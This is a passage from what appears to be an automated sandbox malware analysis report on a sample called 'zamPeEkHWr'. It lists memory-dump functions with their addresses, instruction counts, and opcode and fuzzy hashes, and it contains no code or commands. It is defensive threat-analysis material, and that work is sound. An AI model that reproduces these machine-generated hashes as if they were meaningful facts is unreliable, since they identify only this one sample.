                                                  • Instruction ID: a5ffa2ed591495af8b2f2b37c3aeef66dd834f4cebd6d37831e83e7c5e177857
                                                  • Opcode Fuzzy Hash: e2b8630413c919720130e30960b03692895736ce826f4b55136394727f56ed92
                                                  • Instruction Fuzzy Hash: C451D531F09A0D4FEF58EB9888A56BDB7E2EF9C314F05017AD04DE3292DA346902C751
                                                  Function 00007FFD9B883218 Relevance: .2, Instructions: 197COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7ff6536b90c3242571d2f0c4d99a614e695593d7d8285d078eb43c8c55828b94
                                                  • Instruction ID: 11fde18c8373045eeb08152113d8a4a99878639f33053b5b049596ae98bc55f4
                                                  • Opcode Fuzzy Hash: 7ff6536b90c3242571d2f0c4d99a614e695593d7d8285d078eb43c8c55828b94
                                                  • Instruction Fuzzy Hash: 68615F71A08A4D8FDB98DF58C494BA977E1FF98300F54416DE42EC7295DE34E942CB80
                                                  Function 00007FFD9B88A390 Relevance: .2, Instructions: 192COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e7c24a2e3bbca315ce9a68f98b4c509a49efea96352a121e456dd280fcc4f1cf
                                                  • Instruction ID: 373e0db64745c7db04d35fe0aa1a356980f88208a250390c0b02534e404ffc1b
                                                  • Opcode Fuzzy Hash: e7c24a2e3bbca315ce9a68f98b4c509a49efea96352a121e456dd280fcc4f1cf
                                                  • Instruction Fuzzy Hash: 6741A170B1DA1D4FFA68AB2CA86997573D1EB9C320B05017EE44DC32A6DD25EC424681
                                                  Function 00007FFD9B877230 Relevance: .2, Instructions: 191COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 884005383316b0ce185e47ec07dbf46455f3ee4ee7aaf606565f6f1d053d8003
                                                  • Instruction ID: 9198e196beef9d7d3477376664df5583d79a57832b805aac881a637f07bc9dd4
                                                  • Opcode Fuzzy Hash: 884005383316b0ce185e47ec07dbf46455f3ee4ee7aaf606565f6f1d053d8003
                                                  • Instruction Fuzzy Hash: 9251FB31A0EA9D0FE772677458315E97BA1DF4B320F0602B7D4ADC70E3DD29660A8792
                                                  Function 00007FFD9B878F16 Relevance: .2, Instructions: 187COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf3a43eb20ec276078e3ac9d3e8335ddc171f9b9be0dd361a93b74fd80da5aa8
                                                  • Instruction ID: 00d6247ad96960a3b98ee8262254260ffdcf7cc3946d63e636eefeef450a5387
                                                  • Opcode Fuzzy Hash: bf3a43eb20ec276078e3ac9d3e8335ddc171f9b9be0dd361a93b74fd80da5aa8
                                                  • Instruction Fuzzy Hash: 5241D204B0981E4FEE9FB6E8A17567C5587DFCA608F1404B9D12FD26CBCF2DA9029641
                                                  Function 00007FFD9B89E860 Relevance: .2, Instructions: 183COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6d72a9fad2ea7eb1e439807327373e6d9c560439d285c4ce8a60676d0425c7f1
                                                  • Instruction ID: f92464307b15ab17d6f1449e69d861f0c116466e5eee9859d9968f883db9ab8a
                                                  • Opcode Fuzzy Hash: 6d72a9fad2ea7eb1e439807327373e6d9c560439d285c4ce8a60676d0425c7f1
                                                  • Instruction Fuzzy Hash: 19516862A1EBC95FDB668BBC48A91703FD1DF5B211B0A40FBD08DCB1A3EC186C468351
                                                  Function 00007FFD9B8772C0 Relevance: .2, Instructions: 179COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2b4b3e127d721f33d5e3a8230c53011219fc86f3d1f569afb38d428f9a4886e6
                                                  • Instruction ID: 46c141c3ec5edb050414820cf296c546f978fb7eb7f5eae50ffa3540db7554fb
                                                  • Opcode Fuzzy Hash: 2b4b3e127d721f33d5e3a8230c53011219fc86f3d1f569afb38d428f9a4886e6
                                                  • Instruction Fuzzy Hash: 2A41192BB0A7665BE316A76EE8F55E577A0FFC126D30901B7D1C5CB0A3EC04684B9290
                                                  Function 00007FFD9B871198 Relevance: .2, Instructions: 176COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b30727b49a4407371b4058a946922b08d0ffd70946b02f4cc8ff6eaf62057445
                                                  • Instruction ID: 7d5af98ee138ce798852b862b028f9d325327ab2e7f5c749e284ab997b507abd
                                                  • Opcode Fuzzy Hash: b30727b49a4407371b4058a946922b08d0ffd70946b02f4cc8ff6eaf62057445
                                                  • Instruction Fuzzy Hash: 4651B030B1960E8FEFA4FFA488A16F973A1FF49308F010179E45DD76E6CE38A9419651
                                                  Function 00007FFD9B884584 Relevance: .2, Instructions: 174COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7019c55010c257fcf1aabb622fa99756e573842547c7c9a06697d819fb90b67a
                                                  • Instruction ID: 066c8d7bce06f416c530037bbdebc3e7acb9efbf116ad4c166056e43d7e043c7
                                                  • Opcode Fuzzy Hash: 7019c55010c257fcf1aabb622fa99756e573842547c7c9a06697d819fb90b67a
                                                  • Instruction Fuzzy Hash: EB51EC2290EAD90FE76297B458251E57FE0DF4B220F0E01FBD498C74A3D96D561A8352
                                                  Function 00007FFD9B88A350 Relevance: .2, Instructions: 173COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a481c5fa4c6a579c55aa44ecea4131bf8671bb210dee4512ec5d1cbb921d08b3
                                                  • Instruction ID: af0907f5fe26d9466fc817b9226d9c34ec004e7d024135f971a31d5df5c47690
                                                  • Opcode Fuzzy Hash: a481c5fa4c6a579c55aa44ecea4131bf8671bb210dee4512ec5d1cbb921d08b3
                                                  • Instruction Fuzzy Hash: 2051193071990D8FEBA8EB5C8868B7573E2FF59300F1544BAE44EC72A6DE24ED418751
                                                  Function 00007FFD9B88A780 Relevance: .2, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d11dc012294c01563472f9dab273048dd4270e5b8b0dba14c70f601a59b64c76
                                                  • Instruction ID: 14015794294d2466ddac8adbe6211390322c78f5ff732d1d7c13c93c1d15f4e9
                                                  • Opcode Fuzzy Hash: d11dc012294c01563472f9dab273048dd4270e5b8b0dba14c70f601a59b64c76
                                                  • Instruction Fuzzy Hash: B451263070EA898FD716FB288464A757BA1EF5A310B2501A9D04DC71E7CE29BC46C391
                                                  Function 00007FFD9B888749 Relevance: .2, Instructions: 169COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: adb65acf87f92de608a371a2b6cb2ae73eb2165fec843f68c35a011674020689
                                                  • Instruction ID: 03cf8093e512a24f3b7093d3803fb3574bbc2c84b72290a9271907ec64bad58a
                                                  • Opcode Fuzzy Hash: adb65acf87f92de608a371a2b6cb2ae73eb2165fec843f68c35a011674020689
                                                  • Instruction Fuzzy Hash: 90512331A0890E8FDB98EF58D4957AA73E2FF98310F544569D419C3295DE35E983CB80
                                                  Function 00007FFD9B88BCA8 Relevance: .2, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 50e15cba3d295694f2146f50803a6fcf4add81b8bcdf223a82f3c19726e635c1
                                                  • Instruction ID: 1c9df9a06a33e792171468731c38329e16639ed6e7fe6401f406fe4f56e2bea7
                                                  • Opcode Fuzzy Hash: 50e15cba3d295694f2146f50803a6fcf4add81b8bcdf223a82f3c19726e635c1
                                                  • Instruction Fuzzy Hash: 12512952A0FBD19FE72247E81C351A67FA6EF8578470840FBD0E84B1E7F816AA054382
                                                  Function 00007FFD9B88A5FD Relevance: .2, Instructions: 167COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: da29eac4d024bdff61ab2aabc4e20db207183a05c38556b523c856effbb2fc3b
                                                  • Instruction ID: 5ff5ebd8e2b9fae5d13cbc7e0c64d6838f67cd6ff4f75c77641f58839928d43d
                                                  • Opcode Fuzzy Hash: da29eac4d024bdff61ab2aabc4e20db207183a05c38556b523c856effbb2fc3b
                                                  • Instruction Fuzzy Hash: D541F15270C67256D31B76ECBCB69E97B40CF4127970845B3D2D98A0C7E848204B93E6
                                                  Function 00007FFD9B87BF0B Relevance: .2, Instructions: 165COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a368c3fec23c6e0fef5cfa81b41746e7cbb362c4bb5b2005dd2189ea813c46bc
                                                  • Instruction ID: adaea18a72fe85ab1c629adfa4875610b5ae3860c950806194061b36e7323937
                                                  • Opcode Fuzzy Hash: a368c3fec23c6e0fef5cfa81b41746e7cbb362c4bb5b2005dd2189ea813c46bc
                                                  • Instruction Fuzzy Hash: B0513130A18A4E8FDB89EF54C8A4AE9B7A1FF58304F5405B9D41AC72D6DF35A942CB40
                                                  Function 00007FFD9B87A458 Relevance: .2, Instructions: 156COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e094079b3e7ca0771b3b6a1635b52e15215f58b1633bad0cdc5c144526b81a47
                                                  • Instruction ID: 074c3c44e7f01db8d7b1ccebfa9d799a676fcc9391d5dd6ccbadeab66c7d2d5e
                                                  • Opcode Fuzzy Hash: e094079b3e7ca0771b3b6a1635b52e15215f58b1633bad0cdc5c144526b81a47
                                                  • Instruction Fuzzy Hash: 17417D14B0881E8FDE4FBAD4F1799BCA5869F89604F240474E13FD26C7CF2EA9029A45
                                                  Function 00007FFD9B870A3C Relevance: .2, Instructions: 151COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 637c9a96459266d5b26947a44ff02b9766e7d164fd631b4b9c511fdb067c8e37
                                                  • Instruction ID: ea88c6aa5187450fc8c73d5b9445648d45a6a6a90f24e4b6921f0989e811726f
                                                  • Opcode Fuzzy Hash: 637c9a96459266d5b26947a44ff02b9766e7d164fd631b4b9c511fdb067c8e37
                                                  • Instruction Fuzzy Hash: BA515E74A14A4E8FDF94DF58C894AAA73B2FF58308F504A69E429D7295CB30E951CB80
                                                  Function 00007FFD9B88B8E0 Relevance: .1, Instructions: 149COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4e6e9e18f8811a869305a679c73277e3faa335552f33da2299d87e45e520f7b3
                                                  • Instruction ID: a5219cb4d4050dca0dfeb2604d7cc5c7d209a1b16d01ae7a7bd0702787d71bbd
                                                  • Opcode Fuzzy Hash: 4e6e9e18f8811a869305a679c73277e3faa335552f33da2299d87e45e520f7b3
                                                  • Instruction Fuzzy Hash: 9041F370B0A90E4FE7B9E76984A877123D2FFA9311F5549BAD00DCB1E5DF29E9818300
                                                  Function 00007FFD9B887F50 Relevance: .1, Instructions: 149COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 87116a3a76bc3aedc1a3d198970c2d5b85abda6a4ccb8fb87351cd0e62ce4028
                                                  • Instruction ID: 755bd4b489e458e7f63d4830b710ba289388370e3cae5dfa6318691fe4a44e69
                                                  • Opcode Fuzzy Hash: 87116a3a76bc3aedc1a3d198970c2d5b85abda6a4ccb8fb87351cd0e62ce4028
                                                  • Instruction Fuzzy Hash: BA319B21B1EE4E0FE768E7AC68651BA77D1DF8D320B1501BBD46DC21A6EC34994383C1
                                                  Function 00007FFD9B879E35 Relevance: .1, Instructions: 149COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73c8ab0d6f37b43666d778b655e42415417ff5d5fe34cfa2fc9181e9dfe7f4bb
                                                  • Instruction ID: 680a10067e61dbb58c18615318fe55bc81b86da00a4dec92e93f59676fc5a0d5
                                                  • Opcode Fuzzy Hash: 73c8ab0d6f37b43666d778b655e42415417ff5d5fe34cfa2fc9181e9dfe7f4bb
                                                  • Instruction Fuzzy Hash: 0031C104B0881E4FEE5FB6E8F1756BC65879F89604F1448B5D13FD26CBCF2DA9029641
                                                  Function 00007FFD9B8C23F8 Relevance: .1, Instructions: 147COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 308f63d3780a9ad888670f6f0db4acacd2d50c9addc44b28d697492cd661a7d6
                                                  • Instruction ID: 53dfdcff36049033ca30d509709db42c898f6803db590bee486e118fe19ae778
                                                  • Opcode Fuzzy Hash: 308f63d3780a9ad888670f6f0db4acacd2d50c9addc44b28d697492cd661a7d6
                                                  • Instruction Fuzzy Hash: 5B4103B1A09B494FE7B4E728C094B76B7D2FFAC315F05457AC08EC36A2D668B984C740
                                                  Function 00007FFD9B87A10A Relevance: .1, Instructions: 145COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 104f7ef043a8cfdd72cd6fc3d06b111abc87f64ca4df49142e6ae16a2a49b2e6
                                                  • Instruction ID: 3f4390da2699673d2a49e10c09dbca0563e6d5e8be88e7b720f72230b1592397
                                                  • Opcode Fuzzy Hash: 104f7ef043a8cfdd72cd6fc3d06b111abc87f64ca4df49142e6ae16a2a49b2e6
                                                  • Instruction Fuzzy Hash: 2D31F204B1981E4FEE5F76E8F1755BC98469F8A608F1404B8E13FD27CBCF2DA9019545
                                                  Function 00007FFD9B879DA0 Relevance: .1, Instructions: 143COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e1808d118af861ee970b9e521ad10c9ef280cc2724e3c33107c91cf6810841fa
                                                  • Instruction ID: 5f7b5aa91c17d03386f64b21a20e582395f8cd70917e02849a75238a4bd97d26
                                                  • Opcode Fuzzy Hash: e1808d118af861ee970b9e521ad10c9ef280cc2724e3c33107c91cf6810841fa
                                                  • Instruction Fuzzy Hash: 8331E204B0991E4FEA5FB6E8F1756BC64869F89608F1404B4E13FD37CBCF2DA9029642
                                                  Function 00007FFD9B871B60 Relevance: .1, Instructions: 140COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 71d1d938006917696bbc9d920ae03a6588ea27d6ea0ade7bb6d97df9f413e45c
                                                  • Instruction ID: d476886405a4aaf205be442d52b12512146b130141defe9a9d2e8ea6b14457ca
                                                  • Opcode Fuzzy Hash: 71d1d938006917696bbc9d920ae03a6588ea27d6ea0ade7bb6d97df9f413e45c
                                                  • Instruction Fuzzy Hash: 27418F70609B8E8FDF98DF5888B4A6537A1FF98308B15069DE86DC76D2CB31E912C740
                                                  Function 00007FFD9B88B870 Relevance: .1, Instructions: 140COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 31cd263a1367906c6642bb412c96315c445b2a0c5226d4d0bc23183c406734b7
                                                  • Instruction ID: 6428b44bbbda41160556085f24573145a18b2eb604667018b9b1122545d0a076
                                                  • Opcode Fuzzy Hash: 31cd263a1367906c6642bb412c96315c445b2a0c5226d4d0bc23183c406734b7
                                                  • Instruction Fuzzy Hash: 8131E771B0DA0D4BDB6CAF9C58561B977D1EB99710F00017FE44A832E2DD24BC0242C5
                                                  Function 00007FFD9B879D0B Relevance: .1, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c5cf18bc31298414e2886cdd41e36bce70c6cebdcba3ccee5da0714b71319ae4
                                                  • Instruction ID: 10ce795431556b6c06ca0830faef991bd10d07dfc62346e3db1bdd0b60113e31
                                                  • Opcode Fuzzy Hash: c5cf18bc31298414e2886cdd41e36bce70c6cebdcba3ccee5da0714b71319ae4
                                                  • Instruction Fuzzy Hash: 8D31E304B0891E4FEE9FB6E8E175ABC64869F85604F1404B8D13FD36CBDF2DA9029641
                                                  Function 00007FFD9B87A07F Relevance: .1, Instructions: 137COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 745573e13fba6d34c044aca846fdc742a3912d0b1a36c71b4c7e73c62b9f104e
                                                  • Instruction ID: 97c77da24a023a5f27052945f6977e31abab3ff6d08372cf78b76be6a87c3e8d
                                                  • Opcode Fuzzy Hash: 745573e13fba6d34c044aca846fdc742a3912d0b1a36c71b4c7e73c62b9f104e
                                                  • Instruction Fuzzy Hash: 77310104B0981E4FEE5F76E8F1759BCA8469F86608F1408B8E13FD27CBDF2D69029545
                                                  Function 00007FFD9B879C76 Relevance: .1, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2ed49545e558ad989967ac3ab123a36160f6021a4a01efd67483e0226a0358c6
                                                  • Instruction ID: 3d05345db700c6516a9e58634490c3f9a0521db9bfc3daddbc2de1967ca187a9
                                                  • Opcode Fuzzy Hash: 2ed49545e558ad989967ac3ab123a36160f6021a4a01efd67483e0226a0358c6
                                                  • Instruction Fuzzy Hash: 7B31D004B08C5E4FEE5FB6E8A1796BC64869F89604F1404B4D13FD36DBDF2DA9019641
                                                  Function 00007FFD9B87406C Relevance: .1, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5ba8514082a062ed3d352460ad77c28d69c843db7b4bc35cebc23129d5e027a8
                                                  • Instruction ID: 43293dcad60b57adf17a8fc3dc8f7b19893f6f3c74be4a0999c34ff692c08c39
                                                  • Opcode Fuzzy Hash: 5ba8514082a062ed3d352460ad77c28d69c843db7b4bc35cebc23129d5e027a8
                                                  • Instruction Fuzzy Hash: 44418C71A18A0E8FEB98EF58C4A47AD73E1FB98314F14012DE42DD32D5CB399952CB41
                                                  Function 00007FFD9B879FEA Relevance: .1, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d47a59a2bb9448ca56ee80370311234ba8dfab530e6da766ee16b121adfa457
                                                  • Instruction ID: af0e064f6775751406cbbe50ce27ace6c9987e48552c6370232098744a802c01
                                                  • Opcode Fuzzy Hash: 7d47a59a2bb9448ca56ee80370311234ba8dfab530e6da766ee16b121adfa457
                                                  • Instruction Fuzzy Hash: 66312004B0981E4FEE5FB6E8F1755BC68869F86608F1408B8E13FD27CBCF2D69019645
                                                  Function 00007FFD9B879BE1 Relevance: .1, Instructions: 130COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 877c97434c79ae3bb821c767f4af9af5ded678a7b7a0dcbe4d880b8df474bc0c
                                                  • Instruction ID: cdf1835a085e66ee217be6e6ec35467b376879845da7b751f748803fba900d31
                                                  • Opcode Fuzzy Hash: 877c97434c79ae3bb821c767f4af9af5ded678a7b7a0dcbe4d880b8df474bc0c
                                                  • Instruction Fuzzy Hash: 2231EF04B0881E4FEF9FB6D8E1756BC64869F89604F5408B8D13FD36CBDF2DA9029641
                                                  Function 00007FFD9B88822C Relevance: .1, Instructions: 130COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
